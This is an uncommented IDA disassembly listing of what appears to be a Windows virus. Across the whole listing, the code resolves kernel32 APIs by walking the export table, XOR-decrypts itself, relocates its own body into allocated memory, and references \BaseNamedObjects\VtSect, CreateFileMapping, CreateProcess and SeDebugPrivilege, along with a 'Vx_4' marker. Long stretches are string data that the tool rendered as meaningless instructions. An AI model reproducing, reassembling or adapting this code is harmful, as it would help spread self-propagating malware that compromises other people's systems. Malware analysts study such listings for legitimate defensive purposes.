lea esi, [ebp+1039CCh]
mov ecx, 0
rep movsb
sldt cx
test ecx, ecx
jnz short loc_40A14F
or eax, 0FFFFFFFFh
int 2Eh ; DOS 2+ internal - EXECUTE COMMAND
; DS:SI -> counted CR-terminated command string
loc_40A14F: ; CODE XREF: __u_____:0040A148�j
and ebx, 0FFFFF000h
loc_40A155: ; CODE XREF: __u_____:0040A164�j
cmp dword ptr [ebx+4Eh], 73696854h
jz short loc_40A166
loc_40A15E: ; CODE XREF: __u_____:0040A173�j
sub ebx, 100h
jnz short loc_40A155
loc_40A166: ; CODE XREF: __u_____:0040A15C�j
mov eax, ebx
add eax, [ebx+3Ch]
mov edx, [eax+78h]
cmp word ptr [eax], 4550h
jnz short loc_40A15E
add edx, ebx
mov esi, [edx+20h]
mov ecx, [edx+18h]
add esi, ebx
push ecx
loc_40A180: ; CODE XREF: __u_____:loc_40A194�j
lodsd
add eax, ebx
cmp word ptr [eax+2], 5074h
jnz short loc_40A194
cmp dword ptr [eax+5], 6441636Fh
jz short loc_40A199
loc_40A194: ; CODE XREF: __u_____:0040A189�j
loop loc_40A180
pop ecx
jmp short loc_40A1C4
; ---------------------------------------------------------------------------
loc_40A199: ; CODE XREF: __u_____:0040A192�j
sub [esp], ecx
mov esi, [edx+24h]
pop ecx
add esi, ebx
movzx eax, word ptr [esi+ecx*2]
mov edi, [edx+1Ch]
add edi, ebx
mov esi, [edi+eax*4]
add esi, ebx
lea eax, [ebp+101137h]
lea ecx, [ebp+101120h]
mov dx, [eax-19h]
call ecx
jmp short loc_40A20B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40A252
loc_40A1C4: ; CODE XREF: __u_____:0040A197�j
; sub_40A252+10�j ...
mov eax, [ebp+1039C0h]
and eax, 400000h
jz short loc_40A1F0
lea esi, [ebp+1039C4h]
lodsd
mov edi, [esp+arg_0]
stosd
mov ebx, [ebp+104308h]
movsb
mov edi, [ebp+104310h]
mov esi, [ebp+10430Ch]
loc_40A1F0: ; CODE XREF: sub_40A252-83�j
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_40A252
; ---------------------------------------------------------------------------
dw 0A828h
; =============== S U B R O U T I N E =======================================
sub_40A1F4 proc near ; CODE XREF: sub_40C52F+2DF�p
push ebx
mov ecx, 2889h
mov ebx, edx
loc_40A1FC: ; CODE XREF: sub_40A1F4+13�j
xor [eax], dl
sub dl, bl
add eax, 1
xchg bl, bh
xchg dl, dh
loop loc_40A1FC
pop ebx
retn
sub_40A1F4 endp
; ---------------------------------------------------------------------------
loc_40A20B: ; CODE XREF: __u_____:0040A1C2�j
call near ptr loc_40A21A+2
inc ebx
insb
outsd
jnb short near ptr loc_40A277+3
dec eax
popa
outsb
db 64h
insb
loc_40A21A: ; CODE XREF: __u_____:loc_40A20B�p
add gs:[ebx-1], dl
setalc
mov [ebp+103E62h], eax
call near ptr loc_40A236+1
inc ebx
jb short loc_40A292
popa
jz short near ptr loc_40A294+1
inc ebp
jbe short near ptr loc_40A294+4
outsb
jz short loc_40A277
loc_40A236: ; CODE XREF: __u_____:0040A225�p
add [ebx-1], dl
setalc
mov [ebp+103E66h], eax
call sub_40A252
inc edi
db 65h
jz short near ptr loc_40A294+1
popa
jnb short near ptr loc_40A2BE+2
inc ebp
jb short near ptr loc_40A2BE+3
outsd
jb short $+2
; =============== S U B R O U T I N E =======================================
sub_40A252 proc near ; CODE XREF: __u_____:0040A240�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0040A1C4 SIZE 0000002E BYTES
; FUNCTION CHUNK AT 0040A608 SIZE 0000000B BYTES
push ebx
call esi
mov [ebp+103E6Ah], eax
call sub_40A633
test eax, eax
jz loc_40A1C4
push eax
call dword ptr [ebp+103E6Ah]
test eax, eax
jnz loc_40A608
loc_40A277: ; CODE XREF: __u_____:0040A234�j
; __u_____:0040A213�j
cmp byte ptr [ebp+10153Fh], 1
jnz short loc_40A294
push dword ptr [ebp+104308h]
dec byte ptr [ebp+10153Fh]
pop dword ptr [ebp+101598h]
loc_40A292: ; CODE XREF: __u_____:0040A22B�j
jmp short loc_40A29B
; ---------------------------------------------------------------------------
loc_40A294: ; CODE XREF: sub_40A252+2C�j
; __u_____:0040A22E�j ...
and dword ptr [ebp+101598h], 0
loc_40A29B: ; CODE XREF: sub_40A252:loc_40A292�j
and dword ptr [ebp+101588h], 0
and dword ptr [ebp+10158Ch], 0
and dword ptr [ebp+101590h], 0
push edi
mov byte ptr [ebp+1012D4h], 1
mov [ebp+103E6Eh], esi
loc_40A2BE: ; CODE XREF: __u_____:0040A24A�j
; __u_____:0040A24D�j
lea esi, [ebp+101604h]
xor ecx, ecx
lea edi, [ebp+103E7Ah]
mov cl, 20h
call sub_40A670
pop edi
call dword ptr [ebp+103EBAh]
shr eax, 1Fh
jz loc_40A3B7
mov eax, [edi+14h]
push 40h
add eax, ebx
push 8001000h
mov [ebp+103E72h], eax
push 7328h
push 0
call dword ptr [ebp+103EF2h]
test eax, eax
jz loc_40A608
xchg eax, edi
lea esi, [ebp+7A28C600h]
xchg ch, bh
mov ecx, 0CCAh
sub ebp, 101000h
lea edx, [ebp+101254h]
rep movsd
jmp edx
; ---------------------------------------------------------------------------
sub esp, 20h
mov edi, esp
push 8
xor eax, eax
pop ecx
lea edx, [ebp+101B4Dh]
rep stosd
mov edi, esp
mov [edi+10h], edx
inc byte ptr [edi+1Ch]
push edi
push 10003h
call dword ptr [ebp+103E72h]
add esp, 20h
test eax, eax
jz loc_40A608
xchg eax, edi
push 0
push 1
push 80000400h
push 10000h
call dword ptr [ebp+103E72h]
test eax, eax
jz loc_40A608
push 0
push eax
push 40000h
push 0
shr eax, 0Ch
push edi
push 1
push eax
push 10001h
call dword ptr [ebp+103E72h]
push 1000Ah
call dword ptr [ebp+103E72h]
call loc_40A3A7
jmp loc_40A608
; ---------------------------------------------------------------------------
loc_40A3A7: ; CODE XREF: sub_40A252+14B�p
; sub_40A252+162�j
push 1
pop ecx
jecxz short locret_40A3B6
push 0Ah
call dword ptr [ebp+103EE6h]
jmp short loc_40A3A7
; ---------------------------------------------------------------------------
locret_40A3B6: ; CODE XREF: sub_40A252+158�j
retn
; ---------------------------------------------------------------------------
loc_40A3B7: ; CODE XREF: sub_40A252+8B�j
cmp dword ptr [ebp+103E92h], 0
jz loc_40A608
call near ptr loc_40A3CE+1
dec esi
push esp
inc esp
dec esp
dec esp
loc_40A3CE: ; CODE XREF: sub_40A252+172�p
add bh, bh
sub_40A252 endp ; sp-analysis failed
xchg eax, ebp
scasb
db 3Eh
adc [eax], al
lea esi, [ebp+1017DEh]
xor ecx, ecx
lea edi, [ebp+103EFAh]
mov cl, 0Eh
xchg eax, ebx
call sub_40A670
cmp dword ptr [ebp+103F2Eh], 0
jz loc_40A608
mov eax, [ebp+103EFEh]
push dword ptr [eax+1]
pop dword ptr [ebp+103917h]
mov eax, [ebp+103F16h]
push dword ptr [eax+1]
pop dword ptr [ebp+103964h]
mov eax, [ebp+103F02h]
push dword ptr [eax+1]
pop dword ptr [ebp+10396Bh]
cmp dword ptr [ebp+10396Bh], 10000h
jnb loc_40A608
mov ecx, [ebp+103F06h]
jecxz short loc_40A457
push dword ptr [ecx+1]
pop dword ptr [ebp+103978h]
mov ecx, [ebp+103F0Eh]
jecxz short loc_40A457
push dword ptr [ecx+1]
pop dword ptr [ebp+103985h]
loc_40A457: ; CODE XREF: __u_____:0040A43B�j
; __u_____:0040A44C�j
call sub_40A614
lea edi, [ebp+103F84h]
mov ecx, edi
push 0
neg cl
push dword ptr [eax+4]
and ecx, 3
push 40h
add edi, ecx
push edi
push 0
push 18h
lea esi, [ebp+1015EBh]
mov ecx, 19h
lea eax, ds:0FFFFFFFEh[ecx*2]
stosw
lea eax, ds:0[ecx*2]
stosw
lea eax, [edi+4]
stosd
xor ah, ah
lea edx, [ebp+103E30h]
loc_40A4A0: ; CODE XREF: __u_____:0040A4A9�j
lodsb
mov [edx], ax
stosw
add edx, 2
loop loc_40A4A0
mov edx, esp
push 0
push 7328h
mov ecx, esp
push 0
mov eax, esp
push 0
push 8000000h
push 40h
push ecx
push edx
push 0Eh
push eax
call dword ptr [ebp+103F0Ah]
pop eax
add esp, 40h
push 7328h
mov edx, esp
push 0
mov ecx, esp
push 40h
push 0
push 2
push edx
push 0
push 7328h
push 0
push ecx
push 0FFFFFFFFh
push eax
call dword ptr [ebp+103F12h]
pop edi
pop ecx
test edi, edi
jz loc_40A608
lea esi, [ebp+101000h]
mov ecx, 0CCAh
mov ebp, edi
rep movsd
sub ebp, 101000h
lea eax, [ebp+10144Ah]
jmp eax
; ---------------------------------------------------------------------------
dw 5450h
dd 0FF6A206Ah, 3F1A95FFh, 0C0850010h, 0E834755Fh, 14Fh
dd 11E8h, 44655300h, 67756265h, 76697250h, 67656C69h, 0E8570065h
dd 550h, 4288B5FFh, 95FF0010h, 103E9Eh, 6295FF57h, 6A00103Eh
dd 0FF026A00h, 103E9295h, 128B900h, 2B970000h, 240C89E1h
dd 95FF5754h, 103ED6h, 0A583F633h, 103F72h, 0FF575400h
dd 103EDA95h, 74C08500h, 0FE834666h, 0FFEE7204h, 6A082474h
dd 0FF2A6A00h, 103ED295h, 74C08500h, 88E893DCh, 33000005h
dd 3AE391C9h, 3F728539h, 32750010h, 24247C81h, 73727363h
dd 0C1812874h, 0EAFh, 56505450h, 53505051h, 3E8A95FFh
dd 0C0850010h, 0FF0F7459h, 8F082474h, 103F7285h, 0FDB5E800h
dd 0FF53FFFFh, 103E6295h, 818EEB00h, 128C4h, 95FF5700h
dd 103E62h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40A252
loc_40A608: ; CODE XREF: sub_40A252+1F�j
; sub_40A252+B2�j ...
call dword ptr [ebp+103E62h]
jmp loc_40A1C4
; END OF FUNCTION CHUNK FOR sub_40A252
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40A614 proc near ; CODE XREF: __u_____:loc_40A457�p
; sub_40A633+2�p
pop edx
push 0
push 0
push 0
push 0
push 40001h
mov eax, esp
push 0
push eax
push 0Ch
mov eax, esp
jmp edx
sub_40A614 endp
; ---------------------------------------------------------------------------
aVx_4 db 'Vx_4',0
db 0
; =============== S U B R O U T I N E =======================================
sub_40A633 proc near ; CODE XREF: sub_40A252+9�p
xor ecx, ecx
call sub_40A614
lea edx, [ebp+101559h]
push edx
push ecx
push ecx
push eax
call dword ptr [ebp+103E66h]
add esp, 20h
retn
sub_40A633 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
dd 585858h, 3328h, 0E73h, 3 dup(0)
dd 29C0h, 0
; =============== S U B R O U T I N E =======================================
sub_40A670 proc near ; CODE XREF: sub_40A252+7C�p
; __u_____:0040A3E6�p ...
push ecx
push esi
push ebx
call dword ptr [ebp+103E6Eh]
stosd
pop ecx
loc_40A67B: ; CODE XREF: sub_40A670+E�j
lodsb
test al, al
jnz short loc_40A67B
loop sub_40A670
retn
sub_40A670 endp
; =============== S U B R O U T I N E =======================================
sub_40A683 proc near ; CODE XREF: sub_40C201+25�p
; FUNCTION CHUNK AT 0040A70D SIZE 000003C0 BYTES
; FUNCTION CHUNK AT 0040AADD SIZE 00000027 BYTES
lea edx, [ebp+101985h]
push edx
call dword ptr [ebp+103EC6h]
mov [ebp+104288h], eax
call near ptr loc_40A6B0+1
dec esp
outsd
outsd
imul esi, [ebp+70h], 50h
jb short loc_40A70D
jbe short near ptr loc_40A70D+2
insb
db 65h, 67h, 65h
push esi
popa
insb
jnz short loc_40A714
inc ecx
loc_40A6B0: ; CODE XREF: sub_40A683+13�p
add [eax-1], dl
sub_40A683 endp ; sp-analysis failed
xchg eax, ebp
outsb
db 3Eh
adc [eax], al
mov [ebp+10428Ch], eax
retn
; ---------------------------------------------------------------------------
db 5Ch ; \
db 42h ; B
db 61h ; a
db 73h ; s
db 65h ; e
db 4Eh ; N
db 61h ; a
db 6Dh ; m
db 65h ; e
db 64h ; d
db 4Fh ; O
db 62h ; b
db 6Ah ; j
db 65h ; e
db 63h ; c
db 74h ; t
db 73h ; s
db 5Ch ; \
db 56h ; V
db 74h ; t
db 53h ; S
db 65h ; e
db 63h ; c
db 74h ; t
db 0
db 6Ch ; l
db 73h ; s
db 74h ; t
db 72h ; r
db 6Ch ; l
db 65h ; e
db 6Eh ; n
db 0
db 43h ; C
db 72h ; r
db 65h ; e
db 61h ; a
db 74h ; t
db 65h ; e
db 46h ; F
db 69h ; i
db 6Ch ; l
db 65h ; e
db 41h ; A
db 0
db 43h ; C
db 72h ; r
db 65h ; e
db 61h ; a
db 74h ; t
db 65h ; e
db 46h ; F
db 69h ; i
db 6Ch ; l
db 65h ; e
db 4Dh ; M
db 61h ; a
db 70h ; p
db 70h ; p
db 69h ; i
db 6Eh ; n
db 67h ; g
db 41h ; A
db 0
db 43h ; C
db 72h ; r
db 65h ; e
db 61h ; a
db 74h ; t
db 65h ; e
db 50h ; P
db 72h ; r
db 6Fh ; o
db 63h ; c
db 65h ; e
db 73h ; s
db 73h ; s
db 41h ; A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40A683
loc_40A70D: ; CODE XREF: sub_40A683+1F�j
; sub_40A683+21�j
add [ebx+72h], al
db 65h
popa
jz short near ptr loc_40A777+2
loc_40A714: ; CODE XREF: sub_40A683+2A�j
push edx
db 65h
insd
outsd
jz short loc_40A77F
push esp
push 64616572h
add [ebx+72h], al
db 65h
popa
jz short near ptr loc_40A78A+2
push esp
push 64616572h
add [ebx+72h], al
db 65h
popa
jz short near ptr loc_40A796+3
push esp
outsd
outsd
insb
push 33706C65h
xor dl, [ebx+6Eh]
popa
jo short near ptr loc_40A7B5+1
push 4500746Fh
js short loc_40A7B3
jz short near ptr loc_40A79F+1
push 64616572h
add [esi+69h], al
insb
db 65h
push esp
imul ebp, [ebp+65h], 79536F54h
jnb short loc_40A7D4
db 65h
insd
push esp
imul ebp, [ebp+65h], 65724600h
db 65h
dec esp
imul esp, [edx+72h], 797261h
inc edi
db 65h
jz short near ptr loc_40A7B7+6
loc_40A777: ; CODE XREF: sub_40A683+8F�j
imul ebp, [ebp+41h], 69727474h
loc_40A77F: ; CODE XREF: sub_40A683+95�j
bound esi, [ebp+74h]
db 65h
jnb short loc_40A7C6
add [edi+65h], al
jz short near ptr loc_40A7CF+1
loc_40A78A: ; CODE XREF: sub_40A683+A2�j
imul ebp, [ebp+53h], 657A69h
inc edi
db 65h
jz short loc_40A7DC
loc_40A796: ; CODE XREF: sub_40A683+AF�j
imul ebp, [ebp+54h], 656D69h
inc edi
loc_40A79F: ; CODE XREF: sub_40A683+C7�j
db 65h
jz short near ptr loc_40A7EE+1
outsd
db 64h
jnz short near ptr loc_40A80D+5
db 65h
dec eax
popa
outsb
db 64h
insb
db 65h
inc ecx
add [edi+65h], al
jz short near ptr loc_40A801+6
loc_40A7B3: ; CODE XREF: sub_40A683+C5�j
db 65h
insd
loc_40A7B5: ; CODE XREF: sub_40A683+BE�j
jo short near ptr loc_40A7FB+2
loc_40A7B7: ; CODE XREF: sub_40A683+F1�j
imul ebp, [ebp+4Eh], 41656D61h
add [edi+65h], al
jz short near ptr loc_40A815+3
db 65h
insd
loc_40A7C6: ; CODE XREF: sub_40A683+FF�j
jo short near ptr loc_40A815+3
popa
jz short near ptr loc_40A832+1
inc ecx
add [edi+65h], al
loc_40A7CF: ; CODE XREF: sub_40A683+105�j
jz short loc_40A827
db 65h
jb short near ptr loc_40A846+1
loc_40A7D4: ; CODE XREF: sub_40A683+DB�j
imul ebp, [edi+6Eh], 74654700h
push esi
loc_40A7DC: ; CODE XREF: sub_40A683+110�j
db 65h
jb short near ptr loc_40A850+2
imul ebp, [edi+6Eh], 417845h
inc edi
db 65h
jz short near ptr loc_40A83F+1
outsd
insb
jnz short near ptr loc_40A855+6
loc_40A7EE: ; CODE XREF: sub_40A683:loc_40A79F�j
db 65h
dec ecx
outsb
outsw
jb short near ptr loc_40A860+2
popa
jz short near ptr loc_40A860+1
outsd
outsb
inc ecx
loc_40A7FB: ; CODE XREF: sub_40A683:loc_40A7B5�j
add [edi+ebp*2+61h], cl
db 64h
dec esp
loc_40A801: ; CODE XREF: sub_40A683+12E�j
imul esp, [edx+72h], 41797261h
add [ebp+61h], cl
jo short loc_40A863
loc_40A80D: ; CODE XREF: sub_40A683+120�j
imul esp, [ebp+77h], 6946664Fh
insb
loc_40A815: ; CODE XREF: sub_40A683+13F�j
; sub_40A683:loc_40A7C6�j
add gs:[edi+70h], cl
outs dx, byte ptr gs:[esi]
inc esi
imul ebp, [ebp+4Dh], 69707061h
outsb
db 67h
inc ecx
loc_40A827: ; CODE XREF: sub_40A683:loc_40A7CF�j
add [edi+70h], cl
outs dx, byte ptr gs:[esi]
push eax
jb short near ptr loc_40A89D+1
arpl [ebp+73h], sp
loc_40A832: ; CODE XREF: sub_40A683+146�j
jnb short $+2
push eax
jb short loc_40A8A6
arpl [ebp+73h], sp
jnb short near ptr loc_40A868+7
xor al, [esi+69h]
loc_40A83F: ; CODE XREF: sub_40A683+164�j
jb short near ptr loc_40A8AE+6
jz short $+2
push eax
jb short near ptr loc_40A8AE+7
loc_40A846: ; CODE XREF: sub_40A683+14E�j
arpl [ebp+73h], sp
jnb short near ptr loc_40A87D+1
xor cl, [esi+65h]
js short near ptr loc_40A8C0+4
loc_40A850: ; CODE XREF: sub_40A683:loc_40A7DC�j
add [ebx+65h], dl
jz short near ptr loc_40A899+2
loc_40A855: ; CODE XREF: sub_40A683+169�j
imul ebp, [ebp+41h], 69727474h
bound esi, [ebp+74h]
loc_40A860: ; CODE XREF: sub_40A683+173�j
; sub_40A683+170�j
db 65h
jnb short loc_40A8A4
loc_40A863: ; CODE XREF: sub_40A683+188�j
add [ebx+65h], dl
jz short loc_40A8AE
loc_40A868: ; CODE XREF: sub_40A683+1B7�j
imul ebp, [ebp+54h], 656D69h
push ebx
insb
db 65h, 65h
jo short $+4
push ebx
jns short loc_40A8EC
jz short loc_40A8E0
insd
push esp
loc_40A87D: ; CODE XREF: sub_40A683+1C6�j
imul ebp, [ebp+65h], 69466F54h
insb
db 65h
push esp
imul ebp, [ebp+65h], 6D6E5500h
popa
jo short loc_40A8E7
imul esp, [ebp+77h], 6946664Fh
insb
loc_40A899: ; CODE XREF: sub_40A683+1D0�j
add gs:[esi+69h], dl
loc_40A89D: ; CODE XREF: sub_40A683+1AA�j
jb short near ptr loc_40A912+1
jnz short loc_40A902
insb
inc ecx
insb
loc_40A8A4: ; CODE XREF: sub_40A683:loc_40A860�j
insb
outsd
loc_40A8A6: ; CODE XREF: sub_40A683+1B2�j
arpl [eax], ax
push edi
jb short loc_40A914
jz short loc_40A912
inc esi
loc_40A8AE: ; CODE XREF: sub_40A683+1E3�j
; sub_40A683:loc_40A83F�j ...
imul ebp, [ebp+0], 6441744Eh
push 75h
jnb short loc_40A92E
push eax
jb short near ptr loc_40A923+3
jbe short near ptr loc_40A923+5
insb
loc_40A8C0: ; CODE XREF: sub_40A683+1CB�j
db 65h, 67h, 65h
jnb near ptr 0A919h
outsd
imul esp, [ebp+6Eh], 0
dec esi
jz short near ptr loc_40A90F+1
jb short near ptr loc_40A933+1
popa
jz short loc_40A937
inc esi
imul ebp, [ebp+0], 7243744Eh
db 65h
popa
jz short loc_40A944
push eax
loc_40A8E0: ; CODE XREF: sub_40A683+1F6�j
jb short loc_40A951
arpl [ebp+73h], sp
jnb short $+2
loc_40A8E7: ; CODE XREF: sub_40A683+20C�j
dec esi
jz short near ptr loc_40A92A+3
jb short loc_40A951
loc_40A8EC: ; CODE XREF: sub_40A683+1F4�j
popa
jz short loc_40A954
push eax
jb short loc_40A961
arpl [ebp+73h], sp
jnb short near ptr loc_40A937+5
js short $+2
dec esi
jz short loc_40A93F
jb short loc_40A963
popa
jz short near ptr loc_40A963+3
push ebx
loc_40A902: ; CODE XREF: sub_40A683+21C�j
arpl gs:[ecx+ebp*2+6Fh], si
outsb
add [esi+74h], cl
inc ebx
jb short near ptr loc_40A972+1
popa
loc_40A90F: ; CODE XREF: sub_40A683+248�j
jz short loc_40A976
push ebp
loc_40A912: ; CODE XREF: sub_40A683+228�j
; sub_40A683:loc_40A89D�j
jnb short near ptr loc_40A978+1
loc_40A914: ; CODE XREF: sub_40A683+226�j
jb short near ptr loc_40A963+3
jb short loc_40A987
arpl [ebp+73h], sp
jnb short $+2
dec esi
jz short loc_40A96D
popa
jo short near ptr loc_40A978+1
loc_40A923: ; CODE XREF: sub_40A683+238�j
; sub_40A683+23A�j
imul esp, [ebp+77h], 6553664Fh
loc_40A92A: ; CODE XREF: sub_40A683+265�j
arpl [ecx+ebp*2+6Fh], si
loc_40A92E: ; CODE XREF: sub_40A683+235�j
outsb
add [esi+74h], cl
dec edi
loc_40A933: ; CODE XREF: sub_40A683+24A�j
jo short loc_40A99A
outsb
inc esi
loc_40A937: ; CODE XREF: sub_40A683+24D�j
; sub_40A683+272�j
imul ebp, [ebp+0], 704F744Eh
loc_40A93F: ; CODE XREF: sub_40A683+277�j
outs dx, byte ptr gs:[esi]
push eax
jb short loc_40A9B3
loc_40A944: ; CODE XREF: sub_40A683+25A�j
arpl [ebp+73h], sp
jnb short loc_40A99D
outsd
imul esp, [ebp+6Eh], 0
dec esi
jz short near ptr loc_40A99F+1
loc_40A951: ; CODE XREF: sub_40A683:loc_40A8E0�j
; sub_40A683+267�j
jo short near ptr loc_40A9B7+1
outsb
loc_40A954: ; CODE XREF: sub_40A683+26A�j
push ebx
arpl gs:[ecx+ebp*2+6Fh], si
outsb
add [esi+74h], cl
push eax
jb short near ptr loc_40A9CF+1
loc_40A961: ; CODE XREF: sub_40A683+26D�j
jz short near ptr loc_40A9C7+1
loc_40A963: ; CODE XREF: sub_40A683+279�j
; sub_40A683+27C�j ...
arpl [esi+edx*2+69h], si
jb short loc_40A9DD
jnz short near ptr loc_40A9CB+1
insb
dec ebp
loc_40A96D: ; CODE XREF: sub_40A683+29B�j
db 65h
insd
outsd
jb short near ptr loc_40A9E8+3
loc_40A972: ; CODE XREF: sub_40A683+289�j
add [esi+74h], cl
push ecx
loc_40A976: ; CODE XREF: sub_40A683:loc_40A90F�j
jnz short loc_40A9DD
loc_40A978: ; CODE XREF: sub_40A683:loc_40A912�j
; sub_40A683+29E�j
jb short near ptr loc_40A9F2+1
dec ecx
outsb
outsw
jb short near ptr loc_40A9EC+1
popa
jz short loc_40A9EC
outsd
outsb
push esp
outsd
loc_40A987: ; CODE XREF: sub_40A683+293�j
imul esp, [ebp+6Eh], 0
dec esi
jz short near ptr loc_40A9E3+2
jb short loc_40A9F9
jz short near ptr loc_40A9F6+1
push esi
imul esi, [edx+74h], 4D6C6175h
loc_40A99A: ; CODE XREF: sub_40A683:loc_40A933�j
db 65h
insd
outsd
loc_40A99D: ; CODE XREF: sub_40A683+2C4�j
jb short loc_40AA18
loc_40A99F: ; CODE XREF: sub_40A683+2CC�j
add [edx+74h], dl
insb
push ebp
outsb
imul esp, [ebx+6Fh], 74536564h
jb short near ptr loc_40AA15+2
outsb
db 67h
push esp
outsd
inc ecx
loc_40A9B3: ; CODE XREF: sub_40A683+2BF�j
outsb
jnb short near ptr loc_40AA1E+1
push ebx
loc_40A9B7: ; CODE XREF: sub_40A683:loc_40A951�j
jz short loc_40AA2B
imul ebp, [esi+67h], 41535700h
push ebx
jz short loc_40AA24
jb short loc_40AA39
jnz short near ptr loc_40AA36+1
loc_40A9C7: ; CODE XREF: sub_40A683:loc_40A961�j
add [ebx+6Ch], ah
outsd
loc_40A9CB: ; CODE XREF: sub_40A683+2E6�j
jnb short loc_40AA32
jnb short near ptr loc_40AA3D+1
loc_40A9CF: ; CODE XREF: sub_40A683+2DC�j
arpl [ebx+65h], bp
jz short $+2
arpl [edi+6Eh], bp
outsb
arpl gs:[eax+eax+67h], si
loc_40A9DD: ; CODE XREF: sub_40A683+2E4�j
; sub_40A683:loc_40A976�j
db 65h
jz short near ptr loc_40AA47+1
outsd
jnb short near ptr loc_40AA55+2
loc_40A9E3: ; CODE XREF: sub_40A683+309�j
bound edi, [ecx+6Eh]
popa
insd
loc_40A9E8: ; CODE XREF: sub_40A683+2ED�j
add gs:[edx+65h], dh
loc_40A9EC: ; CODE XREF: sub_40A683+2FE�j
; sub_40A683+2FB�j
arpl [esi+0], si
jnb short near ptr loc_40AA55+1
outsb
loc_40A9F2: ; CODE XREF: sub_40A683:loc_40A978�j
add fs:[ebx+6Fh], dh
loc_40A9F6: ; CODE XREF: sub_40A683+30D�j
arpl [ebx+65h], bp
loc_40A9F9: ; CODE XREF: sub_40A683+30B�j
jz short $+2
dec ecx
outsb
jz short loc_40AA64
jb short loc_40AA6F
db 65h
jz short loc_40AA47
insb
outsd
jnb short near ptr loc_40AA6C+1
dec eax
popa
outsb
db 64h
insb
add gs:[ecx+6Eh], cl
jz short loc_40AA78
jb short near ptr loc_40AA82+1
loc_40AA15: ; CODE XREF: sub_40A683+329�j
db 65h
jz short loc_40AA5F
loc_40AA18: ; CODE XREF: sub_40A683:loc_40A99D�j
db 65h
jz short loc_40AA5E
outsd
outsb
outsb
loc_40AA1E: ; CODE XREF: sub_40A683+331�j
arpl gs:[ebp+64h], si
push ebx
loc_40AA24: ; CODE XREF: sub_40A683+33E�j
jz short near ptr loc_40AA86+1
jz short loc_40AA8D
add [ecx+6Eh], cl
loc_40AA2B: ; CODE XREF: sub_40A683:loc_40A9B7�j
jz short near ptr loc_40AA90+2
jb short loc_40AA9D
db 65h
jz short near ptr loc_40AA7F+2
loc_40AA32: ; CODE XREF: sub_40A683:loc_40A9CB�j
jo short loc_40AA99
outsb
inc ecx
loc_40AA36: ; CODE XREF: sub_40A683+342�j
add [ecx+6Eh], cl
loc_40AA39: ; CODE XREF: sub_40A683+340�j
jz short near ptr loc_40AA9F+1
jb short loc_40AAAB
loc_40AA3D: ; CODE XREF: sub_40A683+34A�j
db 65h
jz short near ptr loc_40AA8E+1
jo short loc_40AAA7
outsb
push ebp
jb short near ptr loc_40AAB0+2
inc ecx
loc_40AA47: ; CODE XREF: sub_40A683+37E�j
; sub_40A683:loc_40A9DD�j
add [ecx+6Eh], cl
jz short near ptr loc_40AAB0+1
jb short loc_40AABC
db 65h
jz short near ptr loc_40AAA2+1
db 65h
popa
db 64h
inc esi
loc_40AA55: ; CODE XREF: sub_40A683+36C�j
; sub_40A683+35E�j
imul ebp, [ebp+0], 41564441h
push eax
loc_40AA5E: ; CODE XREF: sub_40A683:loc_40AA18�j
dec ecx
loc_40AA5F: ; CODE XREF: sub_40A683:loc_40AA15�j
xor esi, [edx]
db 2Eh
inc esp
dec esp
loc_40AA64: ; CODE XREF: sub_40A683+37A�j
dec esp
add [edx+65h], dl
db 67h
inc ebx
insb
outsd
loc_40AA6C: ; CODE XREF: sub_40A683+383�j
jnb short near ptr loc_40AAD1+2
dec ebx
loc_40AA6F: ; CODE XREF: sub_40A683+37C�j
db 65h
jns short $+3
push edx
db 65h, 67h
dec edi
jo short loc_40AADD
loc_40AA78: ; CODE XREF: sub_40A683+38E�j
outsb
dec ebx
db 65h
jns short near ptr loc_40AAC0+2
js short loc_40AAC0
loc_40AA7F: ; CODE XREF: sub_40A683+3AC�j
add [edx+65h], dl
loc_40AA82: ; CODE XREF: sub_40A683+390�j
db 67h
push ecx
jnz short loc_40AAEB
loc_40AA86: ; CODE XREF: sub_40A683:loc_40AA24�j
jb short near ptr loc_40AB00+1
push esi
popa
insb
jnz short near ptr loc_40AAF1+1
loc_40AA8D: ; CODE XREF: sub_40A683+3A3�j
inc ebp
loc_40AA8E: ; CODE XREF: sub_40A683:loc_40AA3D�j
js short loc_40AAD1
loc_40AA90: ; CODE XREF: sub_40A683:loc_40AA2B�j
add [edx+65h], dl
db 67h
push ebx
db 65h
jz short loc_40AAEE
popa
loc_40AA99: ; CODE XREF: sub_40A683:loc_40AA32�j
insb
jnz short near ptr loc_40AB00+1
inc ebp
loc_40AA9D: ; CODE XREF: sub_40A683+3AA�j
js short loc_40AAE0
loc_40AA9F: ; CODE XREF: sub_40A683:loc_40AA39�j
add [esi+33h], dl
loc_40AAA2: ; CODE XREF: sub_40A683+3CB�j
imul byte ptr [edx+2]
push esi
push esi
loc_40AAA7: ; CODE XREF: sub_40A683+3BD�j
mov edx, esp
push 1
loc_40AAAB: ; CODE XREF: sub_40A683+3B8�j
push edx
push dword ptr [edx+18h]
push esi
loc_40AAB0: ; CODE XREF: sub_40A683+3C7�j
; sub_40A683+3C1�j
call dword ptr [ebp+10428Ch]
mov eax, esp
push esi
push esi
push esi
push eax
loc_40AABC: ; CODE XREF: sub_40A683+3C9�j
push esi
push dword ptr [eax+18h]
loc_40AAC0: ; CODE XREF: sub_40A683+3FA�j
; sub_40A683+3F7�j
call dword ptr [ebp+103EFAh]
add esp, 10h
pop esi
retn 8
; END OF FUNCTION CHUNK FOR sub_40A683
; ---------------------------------------------------------------------------
db 8Dh ;
db 49h ; I
db 0FBh ; û
db 2Bh ; +
; ---------------------------------------------------------------------------
loc_40AAD1: ; CODE XREF: sub_40A683:loc_40AA8E�j
; sub_40A683:loc_40AA6C�j
enter 6851h, 0
; ---------------------------------------------------------------------------
db 0
db 0
db 0E8h ; è
db 8Dh ;
db 4Ch ; L
db 24h ; $
db 3
db 6Ah ; j
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40A683
loc_40AADD: ; CODE XREF: sub_40A683+3F3�j
add [edx+5], ch
loc_40AAE0: ; CODE XREF: sub_40A683:loc_40AA9D�j
push ecx
push eax
push ebx
push 5
mov ecx, esp
push eax
mov edx, esp
push eax
loc_40AAEB: ; CODE XREF: sub_40A683+401�j
push esp
